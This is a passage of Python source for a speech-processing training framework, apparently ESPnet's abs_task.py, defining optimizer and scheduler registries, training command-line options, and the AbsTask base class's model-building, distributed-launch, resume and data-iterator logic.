qhm=torch_optimizer.QHM,
radam=torch_optimizer.RAdam,
sgdw=torch_optimizer.SGDW,
yogi=torch_optimizer.Yogi,
)
del torch_optimizer
except ImportError:
pass
try:
import apex
optim_classes.update(
fusedadam=apex.optimizers.FusedAdam,
fusedlamb=apex.optimizers.FusedLAMB,
fusednovograd=apex.optimizers.FusedNovoGrad,
fusedsgd=apex.optimizers.FusedSGD,
)
del apex
except ImportError:
pass
scheduler_classes = dict(
ReduceLROnPlateau=torch.optim.lr_scheduler.ReduceLROnPlateau,
lambdalr=torch.optim.lr_scheduler.LambdaLR,
steplr=torch.optim.lr_scheduler.StepLR,
multisteplr=torch.optim.lr_scheduler.MultiStepLR,
exponentiallr=torch.optim.lr_scheduler.ExponentialLR,
CosineAnnealingLR=torch.optim.lr_scheduler.CosineAnnealingLR,
)
if LooseVersion(torch.__version__) >= LooseVersion("1.1.0"):
scheduler_classes.update(
noamlr=NoamLR, warmuplr=WarmupLR,
)
if LooseVersion(torch.__version__) >= LooseVersion("1.3.0"):
CosineAnnealingWarmRestarts = torch.optim.lr_scheduler.CosineAnnealingWarmRestarts
scheduler_classes.update(
cycliclr=torch.optim.lr_scheduler.CyclicLR,
onecyclelr=torch.optim.lr_scheduler.OneCycleLR,
CosineAnnealingWarmRestarts=CosineAnnealingWarmRestarts,
)
# To lower keys
optim_classes = {k.lower(): v for k, v in optim_classes.items()}
scheduler_classes = {k.lower(): v for k, v in scheduler_classes.items()}
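# Illustrative usage (a sketch, not part of abs_task.py): the lower-cased tables above
# are looked up by name in build_optimizers() and main_worker() below. The toy model
# and hyperparameters here are assumptions.
#
#     import torch
#     model = torch.nn.Linear(8, 2)
#     optim = optim_classes["adam"](model.parameters(), lr=1e-3)    # -> torch.optim.Adam
#     scheduler = scheduler_classes["steplr"](optim, step_size=1)   # -> StepLR
#     optim.step()
#     scheduler.step()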
class AbsTask(ABC):
# Use @staticmethod, or @classmethod,
# instead of instance method to avoid God classes
# If you need more than one optimizer, change this value in the subclass
num_optimizers: int = 1
trainer = Trainer
class_choices_list: List[ClassChoices] = []
def __init__(self):
raise RuntimeError("This class can't be instantiated.")
@classmethod
@abstractmethod
def add_task_arguments(cls, parser: argparse.ArgumentParser):
pass
@classmethod
@abstractmethod
def build_collate_fn(
cls, args: argparse.Namespace
) -> Callable[[Sequence[Dict[str, np.ndarray]]], Dict[str, torch.Tensor]]:
"""Return "collate_fn", which is a callable object and given to DataLoader.
>>> from torch.utils.data import DataLoader
>>> loader = DataLoader(collate_fn=cls.build_collate_fn(args), ...)
In many cases, you can use our common collate_fn.
"""
raise NotImplementedError
@classmethod
@abstractmethod
def build_preprocess_fn(
cls, args: argparse.Namespace, train: bool
) -> Optional[Callable[[str, Dict[str, np.array]], Dict[str, np.ndarray]]]:
raise NotImplementedError
@classmethod
@abstractmethod
def required_data_names(cls, inference: bool = False) -> Tuple[str, ...]:
"""Define the required names by Task
This function is used by
>>> cls.check_task_requirements()
If your model is defined as following,
>>> from espnet2.train.abs_espnet_model import AbsESPnetModel
>>> class Model(AbsESPnetModel):
... def forward(self, input, output, opt=None): pass
then "required_data_names" should be as
>>> required_data_names = ('input', 'output')
"""
raise NotImplementedError
@classmethod
@abstractmethod
def optional_data_names(cls, inference: bool = False) -> Tuple[str, ...]:
"""Define the optional names by Task
This function is used by
>>> cls.check_task_requirements()
If your model is defined as following,
>>> from espnet2.train.abs_espnet_model import AbsESPnetModel
>>> class Model(AbsESPnetModel):
... def forward(self, input, output, opt=None): pass
then "optional_data_names" should be as
>>> optional_data_names = ('opt',)
"""
raise NotImplementedError
@classmethod
@abstractmethod
def build_model(cls, args: argparse.Namespace) -> AbsESPnetModel:
raise NotImplementedError
@classmethod
def get_parser(cls) -> config_argparse.ArgumentParser:
assert check_argument_types()
class ArgumentDefaultsRawTextHelpFormatter(
argparse.RawTextHelpFormatter, argparse.ArgumentDefaultsHelpFormatter,
):
pass
parser = config_argparse.ArgumentParser(
description="base parser",
formatter_class=ArgumentDefaultsRawTextHelpFormatter,
)
# NOTE(kamo): Use '_' instead of '-' to avoid confusion.
# I think '-' looks really confusing if it's written in yaml.
# NOTE(kamo): add_arguments(..., required=True) can't be used
# to provide --print_config mode. Instead, it is handled as follows:
parser.set_defaults(required=["output_dir"])
group = parser.add_argument_group("Common configuration")
group.add_argument(
"--print_config",
action="store_true",
help="Print the config file and exit",
)
group.add_argument(
"--log_level",
type=lambda x: x.upper(),
default="INFO",
choices=("ERROR", "WARNING", "INFO", "DEBUG", "NOTSET"),
help="The verbose level of logging",
)
group.add_argument(
"--dry_run",
type=str2bool,
default=False,
help="Perform process without training",
)
group.add_argument(
"--iterator_type",
type=str,
choices=["sequence", "chunk", "none"],
default="sequence",
help="Specify iterator type",
)
group.add_argument("--output_dir", type=str_or_none, default=None)
group.add_argument(
"--ngpu",
type=int,
default=0,
help="The number of gpus. 0 indicates CPU mode",
)
group.add_argument("--seed", type=int, default=0, help="Random seed")
group.add_argument(
"--num_workers",
type=int,
default=1,
help="The number of workers used for DataLoader",
)
group.add_argument(
"--num_att_plot",
type=int,
default=3,
help="The number images to plot the outputs from attention. "
"This option makes sense only when attention-based model",
)
group = parser.add_argument_group("distributed training related")
group.add_argument(
"--dist_backend", default="nccl", type=str, help="distributed backend",
)
group.add_argument(
"--dist_init_method",
type=str,
default="env://",
help='if init_method="env://", env values of "MASTER_PORT", "MASTER_ADDR", '
'"WORLD_SIZE", and "RANK" are referred.',
)
group.add_argument(
"--dist_world_size",
default=None,
type=int_or_none,
help="number of nodes for distributed training",
)
group.add_argument(
"--dist_rank",
type=int_or_none,
default=None,
help="node rank for distributed training",
)
group.add_argument(
# Not starting with "dist_" for compatibility to launch.py
"--local_rank",
type=int_or_none,
default=None,
help="local rank for distributed training. This option is used if "
"--multiprocessing_distributed=false",
)
group.add_argument(
"--dist_master_addr",
default=None,
type=str_or_none,
help="The master address for distributed training. "
"This value is used when dist_init_method == 'env://'",
)
group.add_argument(
"--dist_master_port",
default=None,
type=int_or_none,
help="The master port for distributed training"
"This value is used when dist_init_method == 'env://'",
)
group.add_argument(
"--dist_launcher",
default=None,
type=str_or_none,
choices=["slurm", "mpi", None],
help="The launcher type for distributed training",
)
group.add_argument(
"--multiprocessing_distributed",
default=False,
type=str2bool,
help="Use multi-processing distributed training to launch "
"N processes per node, which has N GPUs. This is the "
"fastest way to use PyTorch for either single node or "
"multi node data parallel training",
)
group = parser.add_argument_group("cudnn mode related")
group.add_argument(
"--cudnn_enabled",
type=str2bool,
default=torch.backends.cudnn.enabled,
help="Enable CUDNN",
)
group.add_argument(
"--cudnn_benchmark",
type=str2bool,
default=torch.backends.cudnn.benchmark,
help="Enable cudnn-benchmark mode",
)
group.add_argument(
"--cudnn_deterministic",
type=str2bool,
default=True,
help="Enable cudnn-deterministic mode",
)
group = parser.add_argument_group("collect stats mode related")
group.add_argument(
"--collect_stats",
type=str2bool,
default=False,
help='Run in "collect stats" mode',
)
group.add_argument(
"--write_collected_feats",
type=str2bool,
default=False,
help='Write the output features from the model in "collect stats" mode',
)
group = parser.add_argument_group("Trainer related")
group.add_argument(
"--max_epoch",
type=int,
default=40,
help="The maximum number epoch to train",
)
group.add_argument(
"--patience",
type=int_or_none,
default=None,
help="Number of epochs to wait without improvement "
"before stopping the training",
)
group.add_argument(
"--val_scheduler_criterion",
type=str,
nargs=2,
default=("valid", "loss"),
help="The criterion used for the value given to the lr scheduler. "
'Give a pair referring the phase, "train" or "valid",'
'and the criterion name. The mode specifying "min" or "max" can '
"be changed by --scheduler_conf",
)
group.add_argument(
"--early_stopping_criterion",
type=str,
nargs=3,
default=("valid", "loss", "min"),
help="The criterion used for judging of early stopping. "
'Give a pair referring the phase, "train" or "valid",'
'the criterion name and the mode, "min" or "max", e.g. "acc,max".',
)
group.add_argument(
"--best_model_criterion",
type=str2triple_str,
nargs="+",
default=[
("train", "loss", "min"),
("valid", "loss", "min"),
("train", "acc", "max"),
("valid", "acc", "max"),
],
help="The criterion used for judging of the best model. "
'Give a pair referring the phase, "train" or "valid",'
'the criterion name, and the mode, "min" or "max", e.g. "acc,max".',
)
group.add_argument(
"--keep_nbest_models",
type=int,
default=10,
help="Remove previous snapshots excluding the n-best scored epochs",
)
group.add_argument(
"--grad_clip",
type=float,
default=5.0,
help="Gradient norm threshold to clip",
)
group.add_argument(
"--grad_noise",
type=str2bool,
default=False,
help="The flag to switch to use noise injection to "
"gradients during training",
)
group.add_argument(
"--accum_grad",
type=int,
default=1,
help="The number of gradient accumulation",
)
group.add_argument(
"--no_forward_run",
type=str2bool,
default=False,
help="Just only iterating data loading without "
"model forwarding and training",
)
group.add_argument(
"--resume",
type=str2bool,
default=False,
help="Enable resuming if checkpoint is existing",
)
group.add_argument(
"--train_dtype",
default="float32",
choices=["float16", "float32", "float64", "O0", "O1", "O2", "O3"],
help="Data type for training. O0,O1,.. flags require apex. "
"See https://nvidia.github.io/apex/amp.html#opt-levels",
)
group.add_argument(
"--log_interval",
type=int_or_none,
default=None,
help="Show the logs every the number iterations in each epochs at the "
"training phase. If None is given, it is decided according the number "
"of training samples automatically .",
)
group = parser.add_argument_group("Pretraining model related")
group.add_argument("--pretrain_path", type=str, default=[], nargs="*")
group.add_argument("--pretrain_key", type=str_or_none, default=[], nargs="*")
group = parser.add_argument_group("BatchSampler related")
group.add_argument(
"--num_iters_per_epoch",
type=int_or_none,
default=None,
help="Restrict the number of iterations for training per epoch",
)
group.add_argument(
"--batch_size",
type=int,
default=20,
help="The mini-batch size used for training. Used if batch_type='unsorted',"
" 'sorted', or 'folded'.",
)
group.add_argument(
"--valid_batch_size",
type=int_or_none,
default=None,
help="If not given, the value of --batch_size is used",
)
group.add_argument(
"--batch_bins",
type=int,
default=1000000,
help="The number of batch bins. Used if batch_type='length' or 'numel'",
)
group.add_argument(
"--valid_batch_bins",
type=int_or_none,
default=None,
help="If not given, the value of --batch_bins is used",
)
group.add_argument("--train_shape_file", type=str, action="append", default=[])
group.add_argument("--valid_shape_file", type=str, action="append", default=[])
group = parser.add_argument_group("Sequence iterator related")
_batch_type_help = ""
for key, value in BATCH_TYPES.items():
_batch_type_help += f'"{key}":\n{value}\n'
group.add_argument(
"--batch_type",
type=str,
default="folded",
choices=list(BATCH_TYPES),
help=_batch_type_help,
)
group.add_argument(
"--valid_batch_type",
type=str_or_none,
default=None,
choices=list(BATCH_TYPES) + [None],
help="If not given, the value of --batch_type is used",
)
group.add_argument("--fold_length", type=int, action="append", default=[])
group.add_argument(
"--sort_in_batch",
type=str,
default="descending",
choices=["descending", "ascending"],
help="Sort the samples in each mini-batches by the sample "
'lengths. To enable this, "shape_file" must have the length information.',
)
group.add_argument(
"--sort_batch",
type=str,
default="descending",
choices=["descending", "ascending"],
help="Sort mini-batches by the sample lengths",
)
group.add_argument(
"--multiple_iterator",
type=str2bool,
default=False,
help="Use multiple iterator mode",
)
group = parser.add_argument_group("Chunk iterator related")
group.add_argument(
"--chunk_length",
type=str_or_int,
default=500,
help="Specify chunk length. e.g. '300', '300,400,500', or '300-400'."
"If multiple numbers separated by command are given, "
"one of them is selected randomly for each samples. "
"If two numbers are given with '-', it indicates the range of the choices. "
"Note that if the sequence length is shorter than the all chunk_lengths, "
"the sample is discarded. ",
)
group.add_argument(
"--chunk_shift_ratio",
type=float,
default=0.5,
help="Specify the shift width of chunks. If it's less than 1, "
"allows the overlapping and if bigger than 1, there are some gaps "
"between each chunk.",
)
group.add_argument(
"--num_cache_chunks",
type=int,
default=1024,
help="Shuffle in the specified number of chunks and generate mini-batches "
"More larger this value, more randomness can be obtained.",
)
group = parser.add_argument_group("Dataset related")
_data_path_and_name_and_type_help = (
"Give three words splitted by comma. It's used for the training data. "
"e.g. '--train_data_path_and_name_and_type some/path/a.scp,foo,sound'. "
"The first value, some/path/a.scp, indicates the file path, "
"and the second, foo, is the key name used for the mini-batch data, "
"and the last, sound, decides the file type. "
"This option is repeatable, so you can input any number of features "
"for your task. Supported file types are as follows:\n\n"
)
for key, dic in DATA_TYPES.items():
_data_path_and_name_and_type_help += f'"{key}":\n{dic["help"]}\n\n'
group.add_argument(
"--train_data_path_and_name_and_type",
type=str2triple_str,
action="append",
default=[],
help=_data_path_and_name_and_type_help,
)
group.add_argument(
"--valid_data_path_and_name_and_type",
type=str2triple_str,
action="append",
default=[],
)
group.add_argument(
"--allow_variable_data_keys",
type=str2bool,
default=False,
help="Allow the arbitrary keys for mini-batch with ignoring "
"the task requirements",
)
group.add_argument(
"--max_cache_size",
type=humanfriendly.parse_size,
default=0.0,
help="The maximum cache size for data loader. e.g. 10MB, 20GB.",
)
group.add_argument(
"--valid_max_cache_size",
type=humanfriendly_parse_size_or_none,
default=None,
help="The maximum cache size for validation data loader. e.g. 10MB, 20GB. "
"If None, the 5 percent size of --max_cache_size",
)
group = parser.add_argument_group("Optimizer related")
for i in range(1, cls.num_optimizers + 1):
suf = "" if i == 1 else str(i)
group.add_argument(
f"--optim{suf}",
type=lambda x: x.lower(),
default="adadelta",
choices=list(optim_classes),
help="The optimizer type",
)
group.add_argument(
f"--optim{suf}_conf",
action=NestedDictAction,
default=dict(),
help="The keyword arguments for optimizer",
)
group.add_argument(
f"--scheduler{suf}",
type=lambda x: str_or_none(x.lower()),
default=None,
choices=list(scheduler_classes) + [None],
help="The lr scheduler type",
)
group.add_argument(
f"--scheduler{suf}_conf",
action=NestedDictAction,
default=dict(),
help="The keyword arguments for lr scheduler",
)
cls.trainer.add_arguments(parser)
cls.add_task_arguments(parser)
assert check_return_type(parser)
return parser
@classmethod
def build_optimizers(
cls, args: argparse.Namespace, model: torch.nn.Module,
) -> List[torch.optim.Optimizer]:
if cls.num_optimizers != 1:
raise RuntimeError(
"build_optimizers() must be overridden if num_optimizers != 1"
)
optim_class = optim_classes.get(args.optim)
if optim_class is None:
raise ValueError(f"must be one of {list(optim_classes)}: {args.optim}")
optim = optim_class(model.parameters(), **args.optim_conf)
optimizers = [optim]
return optimizers
@classmethod
def exclude_opts(cls) -> Tuple[str, ...]:
"""The options not to be shown by --print_config"""
return "required", "print_config", "config", "ngpu"
@classmethod
def get_default_config(cls) -> Dict[str, Any]:
"""Return the configuration as dict.
This method is used by print_config()
"""
def get_class_type(name: str, classes: dict):
_cls = classes.get(name)
if _cls is None:
raise ValueError(f"must be one of {list(classes)}: {name}")
return _cls
# This method is used only for --print_config
assert check_argument_types()
parser = cls.get_parser()
args, _ = parser.parse_known_args()
config = vars(args)
# Excludes the options not to be shown
for k in AbsTask.exclude_opts():
config.pop(k)
for i in range(1, cls.num_optimizers + 1):
suf = "" if i == 1 else str(i)
name = config[f"optim{suf}"]
optim_class = get_class_type(name, optim_classes)
conf = get_default_kwargs(optim_class)
# Overwrite the default by the arguments,
conf.update(config[f"optim{suf}_conf"])
# and set it again
config[f"optim{suf}_conf"] = conf
name = config[f"scheduler{suf}"]
if name is not None:
scheduler_class = get_class_type(name, scheduler_classes)
conf = get_default_kwargs(scheduler_class)
# Overwrite the default by the arguments,
conf.update(config[f"scheduler{suf}_conf"])
# and set it again
config[f"scheduler{suf}_conf"] = conf
for class_choices in cls.class_choices_list:
if getattr(args, class_choices.name) is not None:
class_obj = class_choices.get_class(getattr(args, class_choices.name))
conf = get_default_kwargs(class_obj)
name = class_choices.name
# Overwrite the default by the arguments,
conf.update(config[f"{name}_conf"])
# and set it again
config[f"{name}_conf"] = conf
return config
@classmethod
def check_required_command_args(cls, args: argparse.Namespace):
assert check_argument_types()
for k in vars(args):
if "-" in k:
raise RuntimeError(f'Use "_" instead of "-": parser.get_parser("{k}")')
if len(args.pretrain_path) != len(args.pretrain_key):
raise RuntimeError(
"The number of --pretrain_path and --pretrain_key must be same"
)
required = ", ".join(
f"--{a}" for a in args.required if getattr(args, a) is None
)
if len(required) != 0:
parser = cls.get_parser()
parser.print_help(file=sys.stderr)
p = Path(sys.argv[0]).name
print(file=sys.stderr)
print(
f"{p}: error: the following arguments are required: " f"{required}",
file=sys.stderr,
)
sys.exit(2)
@classmethod
def check_task_requirements(
cls,
dataset: Union[ESPnetDataset, IterableESPnetDataset],
allow_variable_data_keys: bool,
inference: bool = False,
) -> None:
"""Check if the dataset satisfy the requirement of current Task"""
assert check_argument_types()
mes = (
f"If you intend to use an additional input, modify "
f'"{cls.__name__}.required_data_names()" or '
f'"{cls.__name__}.optional_data_names()". '
f"Otherwise you need to set --allow_variable_data_keys true "
)
for k in cls.required_data_names(inference):
if not dataset.has_name(k):
raise RuntimeError(
f'"{cls.required_data_names(inference)}" are required for'
f' {cls.__name__}. but "{dataset.names()}" are input.\n{mes}'
)
if not allow_variable_data_keys:
task_keys = cls.required_data_names(inference) + cls.optional_data_names(
inference
)
for k in dataset.names():
if k not in task_keys:
raise RuntimeError(
f"The data-name must be one of {task_keys} "
f'for {cls.__name__}: "{k}" is not allowed.\n{mes}'
)
@staticmethod
def resume(
checkpoint: Union[str, Path],
model: torch.nn.Module,
reporter: Reporter,
optimizers: Sequence[torch.optim.Optimizer],
schedulers: Sequence[Optional[AbsScheduler]],
ngpu: int = 0,
use_apex: bool = False,
):
states = torch.load(
checkpoint,
map_location=f"cuda:{torch.cuda.current_device()}" if ngpu > 0 else "cpu",
)
model.load_state_dict(states["model"])
reporter.load_state_dict(states["reporter"])
for optimizer, state in zip(optimizers, states["optimizers"]):
optimizer.load_state_dict(state)
for scheduler, state in zip(schedulers, states["schedulers"]):
if scheduler is not None:
scheduler.load_state_dict(state)
if use_apex and states["amp"] is not None:
try:
from apex import amp
except ImportError:
logging.error(
"You need to install apex. "
"See https://github.com/NVIDIA/apex#linux"
)
raise
amp.load_state_dict(states["amp"])
logging.info(f"The training was resumed using {checkpoint}")
@classmethod
def print_config(cls, file=sys.stdout) -> None:
assert check_argument_types()
# Shows the config: e.g. python train.py asr --print_config
config = cls.get_default_config()
file.write(yaml_no_alias_safe_dump(config, indent=4, sort_keys=False))
@classmethod
def main(cls, args: argparse.Namespace = None, cmd: Sequence[str] = None):
if cls.num_optimizers != cls.trainer.num_optimizers:
raise RuntimeError(
f"Task.num_optimizers != Task.trainer.num_optimizers: "
f"{cls.num_optimizers} != {cls.trainer.num_optimizers}"
)
assert check_argument_types()
print(get_commandline_args(), file=sys.stderr)
if args is None:
parser = cls.get_parser()
args = parser.parse_args(cmd)
if args.print_config:
cls.print_config()
sys.exit(0)
cls.check_required_command_args(args)
# "distributed" is decided using the other command args
resolve_distributed_mode(args)
if not args.distributed or not args.multiprocessing_distributed:
cls.main_worker(args)
else:
assert args.ngpu > 1, args.ngpu
# Multi-processing distributed mode: e.g. 2node-4process-4GPU
# | Host1 | Host2 |
# | Process1 | Process2 | <= Spawn processes
# |Child1|Child2|Child1|Child2|
# |GPU1 |GPU2 |GPU1 |GPU2 |
# See also the following usage of --multiprocessing-distributed:
# https://github.com/pytorch/examples/blob/master/imagenet/main.py
num_nodes = get_num_nodes(args.dist_world_size, args.dist_launcher)
if num_nodes == 1:
args.dist_master_addr = "localhost"
args.dist_rank = 0
# Single node distributed training with multi-GPUs
if (
args.dist_init_method == "env://"
and get_master_port(args.dist_master_port) is None
):
# Get the unused port
args.dist_master_port = free_port()
# Assume that all nodes use the same number of GPUs
args.dist_world_size = args.ngpu * num_nodes
node_rank = get_node_rank(args.dist_rank, args.dist_launcher)
# The following block is copied from:
# https://github.com/pytorch/pytorch/blob/master/torch/multiprocessing/spawn.py
error_queues = []
processes = []
mp = torch.multiprocessing.get_context("spawn")
for i in range(args.ngpu):
# Copy args
local_args = argparse.Namespace(**vars(args))
local_args.local_rank = i
local_args.dist_rank = args.ngpu * node_rank + i
local_args.ngpu = 1
process = mp.Process(
target=cls.main_worker, args=(local_args,), daemon=False,
)
process.start()
processes.append(process)
error_queues.append(mp.SimpleQueue())
# Loop on join until it returns True or raises an exception.
while not ProcessContext(processes, error_queues).join():
pass
@classmethod
def main_worker(cls, args: argparse.Namespace):
assert check_argument_types()
# 0. Init distributed process
distributed_option = build_dataclass(DistributedOption, args)
distributed_option.init()
# NOTE(kamo): Don't use logging before invoking logging.basicConfig()
if not distributed_option.distributed or distributed_option.dist_rank == 0:
if not distributed_option.distributed:
_rank = ""
else:
_rank = (
f":{distributed_option.dist_rank}/"
f"{distributed_option.dist_world_size}"
)
# NOTE(kamo):
# logging.basicConfig() is invoked in main_worker() instead of main()
# because it can be invoked only once in a process.
# FIXME(kamo): Should we use logging.getLogger()?
logging.basicConfig(
level=args.log_level,
format=f"[{os.uname()[1].split('.')[0]}{_rank}]"
f" %(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s",
)
else:
# Suppress logging if RANK != 0
logging.basicConfig(
level="ERROR",
format=f"[{os.uname()[1].split('.')[0]}"
f":{distributed_option.dist_rank}/{distributed_option.dist_world_size}]"
f" %(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s",
)
# 1. Set random-seed
set_all_random_seed(args.seed)
torch.backends.cudnn.enabled = args.cudnn_enabled
torch.backends.cudnn.benchmark = args.cudnn_benchmark
torch.backends.cudnn.deterministic = args.cudnn_deterministic
# 2. Build model
model = cls.build_model(args=args)
if not isinstance(model, AbsESPnetModel):
raise RuntimeError(
f"model must inherit {AbsESPnetModel.__name__}, but got {type(model)}"
)
if args.train_dtype in ("float16", "float32", "float64"):
dtype = getattr(torch, args.train_dtype)
else:
dtype = torch.float32
model = model.to(dtype=dtype, device="cuda" if args.ngpu > 0 else "cpu")
# 3. Build optimizer
optimizers = cls.build_optimizers(args, model=model)
# For apex support
use_apex = args.train_dtype in ("O0", "O1", "O2", "O3")
if use_apex:
try:
from apex import amp
except ImportError:
logging.error(
"You need to install apex. "
"See https://github.com/NVIDIA/apex#linux"
)
raise
model, optimizers = amp.initialize(
model, optimizers, opt_level=args.train_dtype
)
# 4. Build schedulers
schedulers = []
for i, optim in enumerate(optimizers, 1):
suf = "" if i == 1 else str(i)
name = getattr(args, f"scheduler{suf}")
conf = getattr(args, f"scheduler{suf}_conf")
if name is not None:
cls_ = scheduler_classes.get(name)
if cls_ is None:
raise ValueError(
f"must be one of {list(scheduler_classes)}: {name}"
)
scheduler = cls_(optim, **conf)
else:
scheduler = None
schedulers.append(scheduler)
logging.info(pytorch_cudnn_version())
logging.info(model_summary(model))
for i, (o, s) in enumerate(zip(optimizers, schedulers), 1):
suf = "" if i == 1 else str(i)
logging.info(f"Optimizer{suf}:\n{o}")
logging.info(f"Scheduler{suf}: {s}")
# 5. Dump "args" to config.yaml
# NOTE(kamo): "args" should be saved after object-buildings are done
# because they are allowed to modify "args".
output_dir = Path(args.output_dir)
output_dir.mkdir(parents=True, exist_ok=True)
with (output_dir / "config.yaml").open("w", encoding="utf-8") as f:
logging.info(f'Saving the configuration in {output_dir / "config.yaml"}')
yaml_no_alias_safe_dump(vars(args), f, indent=4, sort_keys=False)
# 6. Loads pre-trained model
for p, k in zip(args.pretrain_path, args.pretrain_key):
load_pretrained_model(
model=model,
# Directly specify the model path e.g. exp/train/loss.best.pt
pretrain_path=p,
# if pretrain_key is None -> model
# elif pretrain_key is str e.g. "encoder" -> model.encoder
pretrain_key=k,
# NOTE(kamo): "cuda" for torch.load always indicates cuda:0
# in PyTorch<=1.4
map_location=f"cuda:{torch.cuda.current_device()}"
if args.ngpu > 0
else "cpu",
)
# 7. Resume the training state from the previous epoch
reporter = Reporter()
if args.resume and (output_dir / "checkpoint.pth").exists():
cls.resume(
checkpoint=output_dir / "checkpoint.pth",
model=model,
optimizers=optimizers,
schedulers=schedulers,
reporter=reporter,
ngpu=args.ngpu,
use_apex=use_apex,
)
if args.dry_run:
pass
elif args.collect_stats:
# Perform on collect_stats mode. This mode has two roles
# - Derive the length and dimension of all input data
# - Accumulate feats, square values, and the length for whitening
if args.valid_batch_size is None:
args.valid_batch_size = args.batch_size
if len(args.train_shape_file) != 0:
train_key_file = args.train_shape_file[0]
else:
train_key_file = None
if len(args.valid_shape_file) != 0:
valid_key_file = args.valid_shape_file[0]
else:
valid_key_file = None
collect_stats(
model=model,
train_iter=cls.build_streaming_iterator(
data_path_and_name_and_type=args.train_data_path_and_name_and_type,
key_file=train_key_file,
batch_size=args.batch_size,
dtype=args.train_dtype,
num_workers=args.num_workers,
allow_variable_data_keys=args.allow_variable_data_keys,
ngpu=args.ngpu,
preprocess_fn=cls.build_preprocess_fn(args, train=False),
collate_fn=cls.build_collate_fn(args),
),
valid_iter=cls.build_streaming_iterator(
data_path_and_name_and_type=args.valid_data_path_and_name_and_type,
key_file=valid_key_file,
batch_size=args.valid_batch_size,
dtype=args.train_dtype,
num_workers=args.num_workers,
allow_variable_data_keys=args.allow_variable_data_keys,
ngpu=args.ngpu,
preprocess_fn=cls.build_preprocess_fn(args, train=False),
collate_fn=cls.build_collate_fn(args),
),
output_dir=output_dir,
ngpu=args.ngpu,
log_interval=args.log_interval,
write_collected_feats=args.write_collected_feats,
)
else:
# 8. Build iterator factories
common_iter_kwargs = dict(
iterator_type=args.iterator_type,
train_dtype=args.train_dtype,
num_workers=args.num_workers,
seed=args.seed,
allow_variable_data_keys=args.allow_variable_data_keys,
ngpu=args.ngpu,
fold_length=args.fold_length,
sort_in_batch=args.sort_in_batch,
sort_batch=args.sort_batch,
chunk_length=args.chunk_length,
chunk_shift_ratio=args.chunk_shift_ratio,
num_cache_chunks=args.num_cache_chunks,
)
train_iter_factory = cls.build_iter_factory(
data_path_and_name_and_type=args.train_data_path_and_name_and_type,
shape_files=args.train_shape_file,
batch_size=args.batch_size,
batch_bins=args.batch_bins,
batch_type=args.batch_type,
train=not args.collect_stats,
multiple_iterator=args.multiple_iterator,
preprocess_fn=cls.build_preprocess_fn(args, train=True),
collate_fn=cls.build_collate_fn(args),
num_iters_per_epoch=args.num_iters_per_epoch,
max_cache_size=args.max_cache_size,
distributed=distributed_option.distributed,
name="train",
**common_iter_kwargs,
)
if args.valid_batch_type is None:
args.valid_batch_type = args.batch_type
if args.valid_batch_size is None:
args.valid_batch_size = args.batch_size
if args.valid_batch_bins is None:
args.valid_batch_bins = args.batch_bins
if args.valid_max_cache_size is None:
# Cache 5% of maximum size for validation loader
args.valid_max_cache_size = 0.05 * args.max_cache_size
valid_iter_factory = cls.build_iter_factory(
data_path_and_name_and_type=args.valid_data_path_and_name_and_type,
shape_files=args.valid_shape_file,
batch_size=args.valid_batch_size,
batch_bins=args.valid_batch_bins,
batch_type=args.valid_batch_type,
train=False,
multiple_iterator=False,
preprocess_fn=cls.build_preprocess_fn(args, train=False),
collate_fn=cls.build_collate_fn(args),
num_iters_per_epoch=None,
max_cache_size=args.valid_max_cache_size,
distributed=distributed_option.distributed,
name="valid",
**common_iter_kwargs,
)
if args.num_att_plot != 0:
plot_attention_iter_factory = cls.build_iter_factory(
data_path_and_name_and_type=args.valid_data_path_and_name_and_type,
shape_files=args.valid_shape_file,
batch_type="unsorted",
batch_size=1,
batch_bins=0,
train=False,
multiple_iterator=False,
preprocess_fn=cls.build_preprocess_fn(args, train=False),
collate_fn=cls.build_collate_fn(args),
num_batches=args.num_att_plot,
num_iters_per_epoch=None,
# num_att_plot should be a small number of samples, e.g. ~3, so cache all the data.
max_cache_size=np.inf if args.max_cache_size != 0.0 else 0.0,
# always False because plot_attention performs on RANK0
distributed=False,
name="plot_att",
**common_iter_kwargs,
)
else:
plot_attention_iter_factory = None
# 9. Start training
# Don't pass args to trainer.run() directly!
# Instead, define an "Options" object and build it here.
trainer_options = cls.trainer.build_options(args)
cls.trainer.run(
model=model,
optimizers=optimizers,
schedulers=schedulers,
train_iter_factory=train_iter_factory,
valid_iter_factory=valid_iter_factory,
plot_attention_iter_factory=plot_attention_iter_factory,
reporter=reporter,
output_dir=output_dir,
max_epoch=args.max_epoch,
seed=args.seed,
patience=args.patience,
keep_nbest_models=args.keep_nbest_models,
early_stopping_criterion=args.early_stopping_criterion,
best_model_criterion=args.best_model_criterion,
val_scheduler_criterion=args.val_scheduler_criterion,
trainer_options=trainer_options,
distributed_option=distributed_option,
)
if not distributed_option.distributed or distributed_option.dist_rank == 0:
# Generate the n-best averaged model
average_nbest_models(
reporter=reporter,
output_dir=output_dir,
best_model_criterion=args.best_model_criterion,
nbest=args.keep_nbest_models,
)
@classmethod
def build_iter_factory(
cls,
iterator_type: str,
batch_size: int,
batch_bins: int,
preprocess_fn,
collate_fn,
train_dtype: str,
num_workers: int,
seed: int,
allow_variable_data_keys: bool,
ngpu: int,
data_path_and_name_and_type,
shape_files: Union[Tuple[str, ...], List[str]],
batch_type: str,
train: bool,
num_iters_per_epoch: Optional[int],
max_cache_size: float,
distributed: bool,
name: str,
fold_length: Sequence[int],
sort_in_batch: str,
sort_batch: str,
chunk_length: Union[int, str],
chunk_shift_ratio: float,
num_cache_chunks: int,
multiple_iterator: bool,
num_batches: int = None,
) -> AbsIterFactory:
"""Build a factory object of mini-batch iterator.
This object is invoked at every epoch to build the iterator for that epoch
as follows:
>>> iter_factory = cls.build_iter_factory(...)
>>> for epoch in range(1, max_epoch):
... for keys, batch in iter_factory.build_iter(epoch):
... model(**batch)
The mini-batches for each epoch are fully controlled by this class.
Note that the random seed used for shuffling is decided as "seed + epoch" and
the generated mini-batches can be reproduced when resuming.
Note that the definition of "epoch" doesn't always mean
running over the whole training corpus:
the "--num_iters_per_epoch" option restricts the number of iterations for each epoch
and the remaining samples of the original epoch are carried over to the next epoch.
e.g. If the number of mini-batches equals 4, the following two are the same:
- 1 epoch without "--num_iters_per_epoch"
- 4 epochs with "--num_iters_per_epoch" == 1
"""
assert check_argument_types()
kwargs = dict(
data_path_and_name_and_type=data_path_and_name_and_type,
shape_files=shape_files,
train=train,
preprocess_fn=preprocess_fn,
collate_fn=collate_fn,
num_batches=num_batches,
num_iters_per_epoch=num_iters_per_epoch,
